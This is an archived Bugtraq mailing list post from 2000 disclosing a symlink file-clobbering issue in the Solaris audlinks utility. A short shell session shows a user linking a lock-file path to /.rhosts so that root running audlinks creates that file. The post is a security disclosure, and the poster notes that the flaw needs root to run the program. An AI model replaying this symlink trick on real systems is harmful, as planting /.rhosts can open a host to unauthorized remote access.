Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

[no subject]

From: "Optyx - Uberhax0r Communications"@SECURITYFOCUS.COM
Date: Thu, 28 Dec 2000 14:34:50 -0800
/usr/sbin/audlinks has the following behavior:
$ id
uid=100(optyx) gid=1(other)
$ mkdir -p /tmp/b/dev
$ ln -s /.rhosts /tmp/b/dev/.devfsadm_dev.lock
$ su root
Password:
# /usr/sbin/audlinks -r /tmp/b
# ls -l /.rhosts
-rw-r--r--   1 root     other          4 Dec 28 14:28 /.rhosts

truss output snippet:
open("/dev/.devfsadm_dev.lock", O_RDWR|O_CREAT, 0644) = 4

this is similar to the /usr/sbin/patchadd file clobbering "vulnerability" (not really a vulnerability as a user has to 
set the link then root has to run the program, but)

-Optyx, Uberhax0r Communications
http://www.uberhax0r.net
Previous By Date Next
Previous By Thread Next

Current thread: